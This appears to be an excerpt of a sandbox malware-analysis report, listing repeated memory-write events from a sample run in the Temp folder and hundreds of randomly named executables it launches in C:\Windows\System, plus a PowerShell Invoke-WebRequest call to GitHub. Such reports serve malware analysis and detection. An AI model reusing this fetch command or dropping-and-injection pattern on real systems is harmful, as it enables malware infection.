PID 2444 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\usOrQbM.exe
PID 2444 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\usOrQbM.exe
PID 2444 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\usOrQbM.exe
PID 2444 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\zFDbmiX.exe
PID 2444 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\zFDbmiX.exe
PID 2444 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\zFDbmiX.exe
PID 2444 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\bUThkLF.exe
PID 2444 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\bUThkLF.exe
PID 2444 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\bUThkLF.exe
PID 2444 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\LnfFjfA.exe
PID 2444 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\LnfFjfA.exe
PID 2444 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\LnfFjfA.exe
PID 2444 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\SStcNtA.exe
PID 2444 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\SStcNtA.exe
PID 2444 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\SStcNtA.exe
PID 2444 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\uNExlBv.exe
PID 2444 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\uNExlBv.exe
PID 2444 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\uNExlBv.exe
PID 2444 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\pdxFzOX.exe
PID 2444 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\pdxFzOX.exe
PID 2444 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\pdxFzOX.exe
PID 2444 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\ztSrceU.exe
PID 2444 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\ztSrceU.exe
PID 2444 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\ztSrceU.exe
PID 2444 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\lDcyDzt.exe
PID 2444 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\lDcyDzt.exe
PID 2444 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\lDcyDzt.exe
PID 2444 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\AFzhVuR.exe
PID 2444 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\AFzhVuR.exe
PID 2444 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\AFzhVuR.exe
PID 2444 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\TMquOAO.exe
PID 2444 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\TMquOAO.exe
PID 2444 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\TMquOAO.exe
PID 2444 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\WTAAciN.exe
PID 2444 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\WTAAciN.exe
PID 2444 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\WTAAciN.exe
PID 2444 wrote to memory of 308 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\JFJThNT.exe
PID 2444 wrote to memory of 308 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\JFJThNT.exe
PID 2444 wrote to memory of 308 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\JFJThNT.exe
PID 2444 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\yLNFPir.exe
PID 2444 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\yLNFPir.exe
PID 2444 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\yLNFPir.exe
PID 2444 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\cHOAffe.exe
PID 2444 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\cHOAffe.exe
PID 2444 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\cHOAffe.exe
PID 2444 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\kWUNrbH.exe

Processes

C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\DwgbBFR.exe

C:\Windows\System\DwgbBFR.exe

C:\Windows\System\bZpjHie.exe

C:\Windows\System\bZpjHie.exe

C:\Windows\System\XBAFwez.exe

C:\Windows\System\XBAFwez.exe

C:\Windows\System\ERkbqPk.exe

C:\Windows\System\ERkbqPk.exe

C:\Windows\System\ObCCrpL.exe

C:\Windows\System\ObCCrpL.exe

C:\Windows\System\usOrQbM.exe

C:\Windows\System\usOrQbM.exe

C:\Windows\System\zFDbmiX.exe

C:\Windows\System\zFDbmiX.exe

C:\Windows\System\bUThkLF.exe

C:\Windows\System\bUThkLF.exe

C:\Windows\System\LnfFjfA.exe

C:\Windows\System\LnfFjfA.exe

C:\Windows\System\SStcNtA.exe

C:\Windows\System\SStcNtA.exe

C:\Windows\System\uNExlBv.exe

C:\Windows\System\uNExlBv.exe

C:\Windows\System\pdxFzOX.exe

C:\Windows\System\pdxFzOX.exe

C:\Windows\System\ztSrceU.exe

C:\Windows\System\ztSrceU.exe

C:\Windows\System\lDcyDzt.exe

C:\Windows\System\lDcyDzt.exe

C:\Windows\System\AFzhVuR.exe

C:\Windows\System\AFzhVuR.exe

C:\Windows\System\TMquOAO.exe

C:\Windows\System\TMquOAO.exe

C:\Windows\System\WTAAciN.exe

C:\Windows\System\WTAAciN.exe

C:\Windows\System\JFJThNT.exe

C:\Windows\System\JFJThNT.exe

C:\Windows\System\yLNFPir.exe

C:\Windows\System\yLNFPir.exe

C:\Windows\System\cHOAffe.exe

C:\Windows\System\cHOAffe.exe

C:\Windows\System\kWUNrbH.exe

C:\Windows\System\kWUNrbH.exe

C:\Windows\System\onWTCHy.exe

C:\Windows\System\onWTCHy.exe

C:\Windows\System\pQPuWvN.exe

C:\Windows\System\pQPuWvN.exe

C:\Windows\System\yGohpOV.exe

C:\Windows\System\yGohpOV.exe

C:\Windows\System\WnYTmKA.exe

C:\Windows\System\WnYTmKA.exe

C:\Windows\System\PoWeeZD.exe

C:\Windows\System\PoWeeZD.exe

C:\Windows\System\glHHCvA.exe

C:\Windows\System\glHHCvA.exe

C:\Windows\System\nBQGgsX.exe

C:\Windows\System\nBQGgsX.exe

C:\Windows\System\TPIVpik.exe

C:\Windows\System\TPIVpik.exe

C:\Windows\System\rXzBUty.exe

C:\Windows\System\rXzBUty.exe

C:\Windows\System\vkbDuwW.exe

C:\Windows\System\vkbDuwW.exe

C:\Windows\System\qnqHkCL.exe

C:\Windows\System\qnqHkCL.exe

C:\Windows\System\UQqdLaw.exe

C:\Windows\System\UQqdLaw.exe

C:\Windows\System\aHJosGY.exe

C:\Windows\System\aHJosGY.exe

C:\Windows\System\jiBmTTt.exe

C:\Windows\System\jiBmTTt.exe

C:\Windows\System\tStJThi.exe

C:\Windows\System\tStJThi.exe

C:\Windows\System\efNSaFe.exe

C:\Windows\System\efNSaFe.exe

C:\Windows\System\LIhTeZi.exe

C:\Windows\System\LIhTeZi.exe

C:\Windows\System\qyKYWds.exe

C:\Windows\System\qyKYWds.exe

C:\Windows\System\dboUEZF.exe

C:\Windows\System\dboUEZF.exe

C:\Windows\System\teHxCVx.exe

C:\Windows\System\teHxCVx.exe

C:\Windows\System\WuLIINK.exe

C:\Windows\System\WuLIINK.exe

C:\Windows\System\gHKBzPW.exe

C:\Windows\System\gHKBzPW.exe

C:\Windows\System\OrMKOFu.exe

C:\Windows\System\OrMKOFu.exe

C:\Windows\System\SEXVkNA.exe

C:\Windows\System\SEXVkNA.exe

C:\Windows\System\ERLkbfm.exe

C:\Windows\System\ERLkbfm.exe

C:\Windows\System\xwqTYhV.exe

C:\Windows\System\xwqTYhV.exe

C:\Windows\System\kMHoSND.exe

C:\Windows\System\kMHoSND.exe

C:\Windows\System\pPHLrFp.exe

C:\Windows\System\pPHLrFp.exe

C:\Windows\System\ZEOpEhD.exe

C:\Windows\System\ZEOpEhD.exe

C:\Windows\System\jbcLJvE.exe

C:\Windows\System\jbcLJvE.exe

C:\Windows\System\FBitqkB.exe

C:\Windows\System\FBitqkB.exe

C:\Windows\System\eTplTJF.exe

C:\Windows\System\eTplTJF.exe

C:\Windows\System\vcKZIDV.exe

C:\Windows\System\vcKZIDV.exe

C:\Windows\System\UbJppFB.exe

C:\Windows\System\UbJppFB.exe

C:\Windows\System\lzLQzcD.exe

C:\Windows\System\lzLQzcD.exe

C:\Windows\System\TyyTWmT.exe

C:\Windows\System\TyyTWmT.exe

C:\Windows\System\xEqFwbQ.exe

C:\Windows\System\xEqFwbQ.exe

C:\Windows\System\HbjynPd.exe

C:\Windows\System\HbjynPd.exe

C:\Windows\System\nvFkcfU.exe

C:\Windows\System\nvFkcfU.exe

C:\Windows\System\OQDujtB.exe

C:\Windows\System\OQDujtB.exe

C:\Windows\System\HShdPUn.exe

C:\Windows\System\HShdPUn.exe

C:\Windows\System\jcfKdWw.exe

C:\Windows\System\jcfKdWw.exe

C:\Windows\System\ippixaD.exe

C:\Windows\System\ippixaD.exe

C:\Windows\System\myLSDAH.exe

C:\Windows\System\myLSDAH.exe

C:\Windows\System\EGAYcrm.exe

C:\Windows\System\EGAYcrm.exe

C:\Windows\System\hBhocbo.exe

C:\Windows\System\hBhocbo.exe

C:\Windows\System\ZNqHnAm.exe

C:\Windows\System\ZNqHnAm.exe

C:\Windows\System\jHKDAXc.exe

C:\Windows\System\jHKDAXc.exe

C:\Windows\System\xeDTmZQ.exe

C:\Windows\System\xeDTmZQ.exe

C:\Windows\System\RmfYnhX.exe

C:\Windows\System\RmfYnhX.exe

C:\Windows\System\nazHMNq.exe

C:\Windows\System\nazHMNq.exe

C:\Windows\System\OlHKoDu.exe

C:\Windows\System\OlHKoDu.exe

C:\Windows\System\JARjSpe.exe

C:\Windows\System\JARjSpe.exe

C:\Windows\System\TdLGPrP.exe

C:\Windows\System\TdLGPrP.exe

C:\Windows\System\zwGiDwM.exe

C:\Windows\System\zwGiDwM.exe

C:\Windows\System\SAXoiss.exe

C:\Windows\System\SAXoiss.exe

C:\Windows\System\Soxnyxk.exe

C:\Windows\System\Soxnyxk.exe

C:\Windows\System\jEBbLRb.exe

C:\Windows\System\jEBbLRb.exe

C:\Windows\System\VUXWmyY.exe

C:\Windows\System\VUXWmyY.exe

C:\Windows\System\cZrvxUb.exe

C:\Windows\System\cZrvxUb.exe

C:\Windows\System\xMlnNUB.exe

C:\Windows\System\xMlnNUB.exe

C:\Windows\System\tHAtheL.exe

C:\Windows\System\tHAtheL.exe

C:\Windows\System\awrnxly.exe

C:\Windows\System\awrnxly.exe

C:\Windows\System\CHfvicM.exe

C:\Windows\System\CHfvicM.exe

C:\Windows\System\JhXrHLe.exe

C:\Windows\System\JhXrHLe.exe

C:\Windows\System\yaTYwah.exe

C:\Windows\System\yaTYwah.exe

C:\Windows\System\uWxNdaw.exe

C:\Windows\System\uWxNdaw.exe

C:\Windows\System\lGJNeag.exe

C:\Windows\System\lGJNeag.exe

C:\Windows\System\DREcUbf.exe

C:\Windows\System\DREcUbf.exe

C:\Windows\System\asLPMcq.exe

C:\Windows\System\asLPMcq.exe

C:\Windows\System\tNpNcVV.exe

C:\Windows\System\tNpNcVV.exe

C:\Windows\System\VEabaik.exe

C:\Windows\System\VEabaik.exe

C:\Windows\System\nMtHoPP.exe

C:\Windows\System\nMtHoPP.exe

C:\Windows\System\lbRwDuJ.exe

C:\Windows\System\lbRwDuJ.exe

C:\Windows\System\WBCKfYd.exe

C:\Windows\System\WBCKfYd.exe

C:\Windows\System\KMnaRgJ.exe

C:\Windows\System\KMnaRgJ.exe

C:\Windows\System\wPDqqQA.exe

C:\Windows\System\wPDqqQA.exe

C:\Windows\System\dVQhErm.exe

C:\Windows\System\dVQhErm.exe

C:\Windows\System\SrioUlD.exe

C:\Windows\System\SrioUlD.exe

C:\Windows\System\dLiYfUR.exe

C:\Windows\System\dLiYfUR.exe

C:\Windows\System\grAqoat.exe

C:\Windows\System\grAqoat.exe

C:\Windows\System\sjGPmSw.exe

C:\Windows\System\sjGPmSw.exe

C:\Windows\System\OgUpZcm.exe

C:\Windows\System\OgUpZcm.exe

C:\Windows\System\eVDGIXw.exe

C:\Windows\System\eVDGIXw.exe

C:\Windows\System\cgUdsSi.exe

C:\Windows\System\cgUdsSi.exe

C:\Windows\System\AcOPFbD.exe

C:\Windows\System\AcOPFbD.exe

C:\Windows\System\mSRwhrg.exe

C:\Windows\System\mSRwhrg.exe

C:\Windows\System\lifErcj.exe

C:\Windows\System\lifErcj.exe

C:\Windows\System\LSoWoCP.exe

C:\Windows\System\LSoWoCP.exe

C:\Windows\System\AxKgaTy.exe

C:\Windows\System\AxKgaTy.exe

C:\Windows\System\JSsOmRS.exe

C:\Windows\System\JSsOmRS.exe

C:\Windows\System\TckUwaS.exe

C:\Windows\System\TckUwaS.exe

C:\Windows\System\artxesE.exe

C:\Windows\System\artxesE.exe

C:\Windows\System\uWNfIDc.exe

C:\Windows\System\uWNfIDc.exe

C:\Windows\System\qJwGJVV.exe

C:\Windows\System\qJwGJVV.exe

C:\Windows\System\mBqFqtA.exe

C:\Windows\System\mBqFqtA.exe

C:\Windows\System\bfVflvQ.exe

C:\Windows\System\bfVflvQ.exe

C:\Windows\System\etlcVeO.exe

C:\Windows\System\etlcVeO.exe

C:\Windows\System\dGPQNkJ.exe

C:\Windows\System\dGPQNkJ.exe

C:\Windows\System\kJqusuQ.exe

C:\Windows\System\kJqusuQ.exe

C:\Windows\System\CKARpLd.exe

C:\Windows\System\CKARpLd.exe

C:\Windows\System\fYIjRdo.exe

C:\Windows\System\fYIjRdo.exe

C:\Windows\System\CTqvoNa.exe

C:\Windows\System\CTqvoNa.exe

C:\Windows\System\scXBSQl.exe

C:\Windows\System\scXBSQl.exe

C:\Windows\System\ZYLYRqh.exe

C:\Windows\System\ZYLYRqh.exe

C:\Windows\System\QFPKPzm.exe

C:\Windows\System\QFPKPzm.exe

C:\Windows\System\wMyCbmv.exe

C:\Windows\System\wMyCbmv.exe

C:\Windows\System\stWKBua.exe

C:\Windows\System\stWKBua.exe

C:\Windows\System\hNlxfNz.exe

C:\Windows\System\hNlxfNz.exe

C:\Windows\System\XmTnHMw.exe

C:\Windows\System\XmTnHMw.exe

C:\Windows\System\RNoIgPa.exe

C:\Windows\System\RNoIgPa.exe

C:\Windows\System\gAkXTpR.exe

C:\Windows\System\gAkXTpR.exe

C:\Windows\System\tjAEcFN.exe

C:\Windows\System\tjAEcFN.exe

C:\Windows\System\wTOvpbk.exe

C:\Windows\System\wTOvpbk.exe

C:\Windows\System\ICasjcH.exe

C:\Windows\System\ICasjcH.exe

C:\Windows\System\UgGwclS.exe

C:\Windows\System\UgGwclS.exe

C:\Windows\System\JkbJqxj.exe

C:\Windows\System\JkbJqxj.exe

C:\Windows\System\FfnVQyW.exe

C:\Windows\System\FfnVQyW.exe

C:\Windows\System\JbeVFnS.exe

C:\Windows\System\JbeVFnS.exe

C:\Windows\System\OxjDHDi.exe

C:\Windows\System\OxjDHDi.exe

C:\Windows\System\ecOFCVK.exe

C:\Windows\System\ecOFCVK.exe

C:\Windows\System\dvPixJz.exe

C:\Windows\System\dvPixJz.exe

C:\Windows\System\kOWdlRC.exe

C:\Windows\System\kOWdlRC.exe

C:\Windows\System\RESzjgf.exe

C:\Windows\System\RESzjgf.exe

C:\Windows\System\ORKWAfm.exe

C:\Windows\System\ORKWAfm.exe

C:\Windows\System\otsstWq.exe

C:\Windows\System\otsstWq.exe

C:\Windows\System\LKHDIct.exe

C:\Windows\System\LKHDIct.exe

C:\Windows\System\BeMBImV.exe

C:\Windows\System\BeMBImV.exe

C:\Windows\System\ciXBkuU.exe

C:\Windows\System\ciXBkuU.exe

C:\Windows\System\ZUjIawI.exe

C:\Windows\System\ZUjIawI.exe

C:\Windows\System\nIYZbiu.exe

C:\Windows\System\nIYZbiu.exe

C:\Windows\System\LGRAfLi.exe

C:\Windows\System\LGRAfLi.exe

C:\Windows\System\DMvugxH.exe

C:\Windows\System\DMvugxH.exe

C:\Windows\System\AKFKGkH.exe

C:\Windows\System\AKFKGkH.exe

C:\Windows\System\yBORWoA.exe

C:\Windows\System\yBORWoA.exe

C:\Windows\System\QkyKnlI.exe

C:\Windows\System\QkyKnlI.exe

C:\Windows\System\LFePwCC.exe

C:\Windows\System\LFePwCC.exe

C:\Windows\System\VefzlhF.exe

C:\Windows\System\VefzlhF.exe

C:\Windows\System\ssMfFHz.exe

C:\Windows\System\ssMfFHz.exe

C:\Windows\System\sVDhcwr.exe

C:\Windows\System\sVDhcwr.exe

C:\Windows\System\RdHGjWd.exe

C:\Windows\System\RdHGjWd.exe

C:\Windows\System\rxlXkgz.exe

C:\Windows\System\rxlXkgz.exe

C:\Windows\System\lJRUmzd.exe

C:\Windows\System\lJRUmzd.exe

C:\Windows\System\QmMyGMY.exe

C:\Windows\System\QmMyGMY.exe

C:\Windows\System\QPvdnFh.exe

C:\Windows\System\QPvdnFh.exe

C:\Windows\System\xppSOZS.exe

C:\Windows\System\xppSOZS.exe

C:\Windows\System\fLNSFbP.exe

C:\Windows\System\fLNSFbP.exe

C:\Windows\System\ZvuhUSt.exe

C:\Windows\System\ZvuhUSt.exe

C:\Windows\System\uluETlK.exe

C:\Windows\System\uluETlK.exe

C:\Windows\System\cHXkZEk.exe

C:\Windows\System\cHXkZEk.exe

C:\Windows\System\VihAtUn.exe

C:\Windows\System\VihAtUn.exe

C:\Windows\System\tyVXNyW.exe

C:\Windows\System\tyVXNyW.exe

C:\Windows\System\gOIsHzl.exe

C:\Windows\System\gOIsHzl.exe

C:\Windows\System\NWuJpbh.exe

C:\Windows\System\NWuJpbh.exe

C:\Windows\System\GdoPkWu.exe

C:\Windows\System\GdoPkWu.exe

C:\Windows\System\XwZHaVR.exe

C:\Windows\System\XwZHaVR.exe

C:\Windows\System\DvpECHV.exe

C:\Windows\System\DvpECHV.exe

C:\Windows\System\uzNKumH.exe

C:\Windows\System\uzNKumH.exe

C:\Windows\System\uVSAgoa.exe

C:\Windows\System\uVSAgoa.exe

C:\Windows\System\MafkHNP.exe

C:\Windows\System\MafkHNP.exe

C:\Windows\System\VHzLbhV.exe

C:\Windows\System\VHzLbhV.exe

C:\Windows\System\jvNlSoB.exe

C:\Windows\System\jvNlSoB.exe

C:\Windows\System\yHgUJYe.exe

C:\Windows\System\yHgUJYe.exe

C:\Windows\System\bALNQJa.exe

C:\Windows\System\bALNQJa.exe

C:\Windows\System\ZzsIRrz.exe

C:\Windows\System\ZzsIRrz.exe

C:\Windows\System\guHYuwb.exe

C:\Windows\System\guHYuwb.exe

C:\Windows\System\BrLUzKr.exe

C:\Windows\System\BrLUzKr.exe

C:\Windows\System\rDCCAMw.exe

C:\Windows\System\rDCCAMw.exe

C:\Windows\System\OVkUDnh.exe

C:\Windows\System\OVkUDnh.exe

C:\Windows\System\weSEZNt.exe

C:\Windows\System\weSEZNt.exe

C:\Windows\System\klxBoDa.exe

C:\Windows\System\klxBoDa.exe

C:\Windows\System\pUAjMVD.exe

C:\Windows\System\pUAjMVD.exe

C:\Windows\System\MGsVJbT.exe

C:\Windows\System\MGsVJbT.exe

C:\Windows\System\WSKJUQJ.exe

C:\Windows\System\WSKJUQJ.exe

C:\Windows\System\PJijaxE.exe

C:\Windows\System\PJijaxE.exe

C:\Windows\System\BQHpFPC.exe

C:\Windows\System\BQHpFPC.exe

C:\Windows\System\wBJyLPA.exe

C:\Windows\System\wBJyLPA.exe

C:\Windows\System\fUtfszy.exe

C:\Windows\System\fUtfszy.exe

C:\Windows\System\ebRkUbo.exe

C:\Windows\System\ebRkUbo.exe

C:\Windows\System\BqODihY.exe

C:\Windows\System\BqODihY.exe

C:\Windows\System\ySGyUBp.exe

C:\Windows\System\ySGyUBp.exe

C:\Windows\System\IjpHLYV.exe

C:\Windows\System\IjpHLYV.exe

C:\Windows\System\tmuxaJK.exe

C:\Windows\System\tmuxaJK.exe

C:\Windows\System\DZjZuKl.exe

C:\Windows\System\DZjZuKl.exe

C:\Windows\System\Moqgefx.exe

C:\Windows\System\Moqgefx.exe

C:\Windows\System\BOZFsAs.exe

C:\Windows\System\BOZFsAs.exe

C:\Windows\System\Eyukqcb.exe

C:\Windows\System\Eyukqcb.exe

C:\Windows\System\suUVdxc.exe

C:\Windows\System\suUVdxc.exe

C:\Windows\System\vFdhBhH.exe

C:\Windows\System\vFdhBhH.exe

C:\Windows\System\YhuDQtx.exe

C:\Windows\System\YhuDQtx.exe

C:\Windows\System\mMyHfCc.exe

C:\Windows\System\mMyHfCc.exe

C:\Windows\System\VwLRlMO.exe

C:\Windows\System\VwLRlMO.exe

C:\Windows\System\eEQTDfz.exe

C:\Windows\System\eEQTDfz.exe

C:\Windows\System\UqbaFbA.exe

C:\Windows\System\UqbaFbA.exe

C:\Windows\System\wAoEtOj.exe

C:\Windows\System\wAoEtOj.exe

C:\Windows\System\fhGxFvR.exe

C:\Windows\System\fhGxFvR.exe

C:\Windows\System\kqMTUUm.exe

C:\Windows\System\kqMTUUm.exe

C:\Windows\System\PORdOFc.exe

C:\Windows\System\PORdOFc.exe

C:\Windows\System\OqnuoGy.exe

C:\Windows\System\OqnuoGy.exe

C:\Windows\System\DmDbeVP.exe

C:\Windows\System\DmDbeVP.exe

C:\Windows\System\lLbzwwq.exe

C:\Windows\System\lLbzwwq.exe

C:\Windows\System\QxQvbrv.exe

C:\Windows\System\QxQvbrv.exe

C:\Windows\System\lGAfJKA.exe

C:\Windows\System\lGAfJKA.exe

C:\Windows\System\fBYtzLi.exe

C:\Windows\System\fBYtzLi.exe

C:\Windows\System\EJUlSsY.exe

C:\Windows\System\EJUlSsY.exe

C:\Windows\System\DQvIPdD.exe

C:\Windows\System\DQvIPdD.exe

C:\Windows\System\LbRpgwh.exe

C:\Windows\System\LbRpgwh.exe

C:\Windows\System\ArgyfIz.exe

C:\Windows\System\ArgyfIz.exe

C:\Windows\System\jbBSKKb.exe

C:\Windows\System\jbBSKKb.exe

C:\Windows\System\FaTKjmd.exe

C:\Windows\System\FaTKjmd.exe

C:\Windows\System\WEvNMWv.exe

C:\Windows\System\WEvNMWv.exe

C:\Windows\System\DJtRHrf.exe

C:\Windows\System\DJtRHrf.exe

C:\Windows\System\tADPRzg.exe

C:\Windows\System\tADPRzg.exe

C:\Windows\System\NQGcHAp.exe

C:\Windows\System\NQGcHAp.exe

C:\Windows\System\qJdwRfX.exe

C:\Windows\System\qJdwRfX.exe

C:\Windows\System\yBxVCNU.exe

C:\Windows\System\yBxVCNU.exe

C:\Windows\System\sjokROh.exe

C:\Windows\System\sjokROh.exe

C:\Windows\System\lbBzMBR.exe

C:\Windows\System\lbBzMBR.exe

C:\Windows\System\sWhQNXd.exe

C:\Windows\System\sWhQNXd.exe

C:\Windows\System\BlNntFo.exe

C:\Windows\System\BlNntFo.exe

C:\Windows\System\oKvGFKG.exe

C:\Windows\System\oKvGFKG.exe

C:\Windows\System\nSFQKCq.exe

C:\Windows\System\nSFQKCq.exe

C:\Windows\System\xZHordY.exe

C:\Windows\System\xZHordY.exe

C:\Windows\System\KwPaPVF.exe

C:\Windows\System\KwPaPVF.exe

C:\Windows\System\ePpEeUT.exe

C:\Windows\System\ePpEeUT.exe

C:\Windows\System\LZBbzRi.exe

C:\Windows\System\LZBbzRi.exe

C:\Windows\System\PHvGjck.exe

C:\Windows\System\PHvGjck.exe

C:\Windows\System\koqOPey.exe

C:\Windows\System\koqOPey.exe

C:\Windows\System\cSOOgPA.exe

C:\Windows\System\cSOOgPA.exe

C:\Windows\System\FfXYJLO.exe

C:\Windows\System\FfXYJLO.exe

C:\Windows\System\mIzVcsp.exe

C:\Windows\System\mIzVcsp.exe

C:\Windows\System\nUlfgAL.exe

C:\Windows\System\nUlfgAL.exe

C:\Windows\System\NnVEuui.exe

C:\Windows\System\NnVEuui.exe

C:\Windows\System\GHyaUmN.exe

C:\Windows\System\GHyaUmN.exe

C:\Windows\System\EopTMcR.exe

C:\Windows\System\EopTMcR.exe

C:\Windows\System\wSeVAKN.exe

C:\Windows\System\wSeVAKN.exe

C:\Windows\System\ONgEFNm.exe

C:\Windows\System\ONgEFNm.exe

C:\Windows\System\hAveABw.exe

C:\Windows\System\hAveABw.exe

C:\Windows\System\IZnehED.exe

C:\Windows\System\IZnehED.exe

C:\Windows\System\IWYrGVC.exe

C:\Windows\System\IWYrGVC.exe

C:\Windows\System\aTxJzbd.exe

C:\Windows\System\aTxJzbd.exe

C:\Windows\System\IKggkFD.exe

C:\Windows\System\IKggkFD.exe

C:\Windows\System\lHPbBmI.exe

C:\Windows\System\lHPbBmI.exe

C:\Windows\System\gpobwUz.exe

C:\Windows\System\gpobwUz.exe

C:\Windows\System\bKoSeJl.exe

C:\Windows\System\bKoSeJl.exe

C:\Windows\System\ouVFJXE.exe

C:\Windows\System\ouVFJXE.exe

C:\Windows\System\EuNmphH.exe

C:\Windows\System\EuNmphH.exe

C:\Windows\System\UCqHwUH.exe

C:\Windows\System\UCqHwUH.exe

